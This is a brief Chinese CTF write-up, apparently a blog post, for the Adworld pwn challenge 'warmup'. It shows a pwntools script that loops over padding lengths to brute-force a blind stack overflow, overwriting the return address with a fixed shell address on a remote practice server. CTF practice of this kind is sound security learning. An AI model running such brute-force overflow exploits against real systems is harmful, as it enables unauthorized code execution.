攻防世界 - pwn - warmup

接触的比较少的盲打类型,算是积累经验吧,用到的漏洞是栈溢出,需要考虑64位和32位系统两种情况,并用try except做自动化的测试。

exp:

from pwn import *

# context.log_level = "debug"
shell = 0x40060d

for i in range(1000):
    r = remote("111.200.241.244", 62243)
    log.info("payload lenth:" + str(i))
    try:
        r.sendlineafter(b">", cyclic(i) + p64(shell))
        print(r.recv())
    except:
        pass

64位没跑通换32位即可。

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • 歇了很长一段时间,终于开始了我的攻防世界pwn之路。立一个flag:每日一题,只能多不能少。 0x00 dice_...
    Adam_0阅读 11,985评论 2 7
  • 0x00 get_shell 0x01 CGfsb 首先检查保护 nc连接输入信息为aaaa加很多个控制字符发现p...
    Adam_0阅读 12,361评论 0 30
  • 0x01get_shell 下载附件后直接丢IDA F5 0x02CGfsb 先用checksec查看开了哪些保护...
    Zerek_W阅读 4,676评论 0 0
  • 格式化字符串漏洞加栈溢出,先看main函数逻辑: 程序中有cat flag的函数,只需栈溢出后修改返回地址。1为栈...
    阿X_e0ec阅读 3,798评论 0 0
  • 就按照题目的难易程度写 新手区没有涉及到栈的相关知识,几乎是栈漏洞 get_shell 第一个题目比较简单 ida...
    Hexad阅读 4,427评论 0 0

友情链接更多精彩内容